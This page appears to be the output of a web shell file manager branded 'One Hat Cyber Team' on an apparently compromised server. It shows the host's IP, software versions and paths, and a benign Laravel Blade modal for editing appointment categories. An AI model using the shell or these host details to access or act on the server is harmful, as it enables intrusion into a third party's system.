⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.23
Server IP:
178.33.27.10
Server:
Linux cpanel.dev-unit.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Server Software:
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
PHP Version:
8.2.11
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
id
/
public_html
/
storage
/
framework
/
views
/
View File Name :
9956a5cbd4c911ce57c6163ecbdedbcec3f49758.php
<div class="modal fade" id="editCategoryModal" tabindex="-1" role="dialog" aria-labelledby="editCategoryModal" aria-hidden="true"> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="modal-header"> <h5 class="modal-title" id="editCategoryModal"> <?php echo e($keywords['Edit_Category'] ?? __('Edit Category')); ?></h5> <button type="button" class="close" data-dismiss="modal" aria-label="Close"> <span aria-hidden="true">×</span> </button> </div> <div class="modal-body"> <form id="editForm" action="<?php echo e(route('user.category.store')); ?>" method="POST" enctype="multipart/form-data"> <?php echo csrf_field(); ?> <input type="hidden" name="table_id" id="table_id" placeholder="Enter Category Name" class="form-control "> <div class="form-group"> <div class="col-12 mb-2 p-0"> <label for="image"><strong><?php echo e($keywords['Image'] ?? __('Image')); ?> **</strong></label> </div> <div class="col-md-12 showImage mb-3"> <img id="imageSrc" src="<?php echo e(asset('assets/admin/img/noimage.jpg')); ?>" alt="..." class="img-thumbnail" width="75"> </div> <input type="file" name="image" id="image" class="form-control"> <p class="text-warning mb-0 mt-2"> <?php echo e($keywords['img_validation_msg'] ?? __('** Only JPG, PNG, JPEG, SVG Images are allowed')); ?> </p> <p id="errimage" class="mb-0 text-danger em"></p> </div> <div class="form-group"> <label for=""><?php echo e($keywords['Category_name'] ?? __('Category name')); ?> *</label> <input required type="text" name="name" id="name" placeholder="<?php echo e($keywords['enter_category_name'] ?? __('Enter category name')); ?>" class="form-control "> </div> <div class="form-group"> <label for=""><?php echo e($keywords['Fee'] ?? __('Fee')); ?> * (<?php echo e($userBs->base_currency_symbol); ?>)</label> <input required type="number" name="price" id="price" placeholder="<?php echo e($keywords['enter_fee'] ?? __('Enter fee')); ?>" class="form-control "> </div> </form> </div> <div class="modal-footer"> <button type="button" class="btn btn-secondary" data-dismiss="modal"> <?php echo e($keywords['Close'] ?? __('Close')); ?> </button> <button form="editForm" type="submit" class="btn btn-primary"> <?php echo e($keywords['save'] ?? __('Save')); ?> </button> </div> </div> </div> </div> <?php /**PATH /home/id/public_html/resources/views/user/appointment/modals/edit-category.blade.php ENDPATH**/ ?>